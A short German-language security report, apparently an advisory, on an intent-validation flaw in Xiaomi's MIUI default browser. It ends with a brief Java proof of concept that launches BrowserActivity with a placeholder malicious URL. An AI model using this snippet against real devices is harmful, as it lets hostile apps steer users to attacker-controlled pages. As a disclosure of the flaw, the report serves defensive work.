
Technischer Bericht über kritische Xiaomi-Sicherheitslücke
Technischer Bericht über eine kritische Xiaomi-Schwachstelle
Zusammenfassung der Schwachstelle
In Xiaomis Standardbrowser (com.android.browser) auf verschiedenen MIUI-Geräten wurde eine Schwachstelle entdeckt. Die App validiert die über startActivity übergebenen Intents nicht ordnungsgemäß, sodass bösartige Apps beliebige URLs öffnen oder unbeabsichtigte Aktionen ausführen können.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);